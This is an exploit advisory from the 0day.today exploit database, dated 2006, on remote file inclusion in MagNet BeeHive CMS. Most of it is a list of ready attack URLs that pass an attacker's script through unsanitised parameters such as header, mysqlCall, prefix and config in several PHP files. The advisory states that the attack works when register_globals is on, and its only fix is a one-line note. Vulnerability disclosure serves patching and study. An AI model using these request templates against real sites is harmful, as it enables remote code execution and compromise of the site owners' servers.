[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MagNet BeeHive CMS (header) Remote File Include Vulnerability

Author
Kw3[R]Ln
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-545
Category
web applications
Date add
24-06-2006
Platform
unsorted
=============================================================
MagNet BeeHive CMS (header) Remote File Include Vulnerability
=============================================================




---------------------------------------------------------------------------
Beehive CMS ([header]) Remote File Include Vulnerabilities
---------------------------------------------------------------------------

Discovered By Kw3[R]Ln [ Romanian Security Team ]
Remote : Yes
Critical Level : Dangerous

---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Beehive CMS
version : latest version
URL : http://products.magnet-i.com/show/beehive/

------------------------------------------------------------------
Exploit:
~~~~~~~~

Variable $header not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.


# http://www.site.com/[path]/conad/include/rootGui.inc.php?header=[evil_script]
# http://www.site.com/[path]/conad/changeEmail.inc.php?mysqlCall=[evil_script]
# http://www.site.com/[path]/conad/changeUserDetails.inc.php?mysqlCall=[evil_script]
# http://www.site.com/[path]/conad/checkPasswd.inc.php?mysqlCall=[evil_script]
# http://www.site.com/[path]/conad/login.inc.php?mysqlCall=[evil_script]
# http://www.site.com/[path]/conad/logout.inc.php?mysqlCall=[evil_script]
# http://www.site.com/[path]/include/listall.inc.php?mysqlcall=[evil_script]
# http://www.site.com/[path]/show/index.php?prefix=[evil_script]
# http://www.site.com/[path]/conad/include/mysqlCall.inc.php?config=[evil_script]
# http://www.site.com/[path]/include/rootGui.inc.php?header=[evil_script]

---------------------------------------------------------------------------


Solution :
~~~~~~~~~~

declare variabel $header



-------------------------------- [ EOF] ----------------------------------




#  0day.today [2024-12-24]  #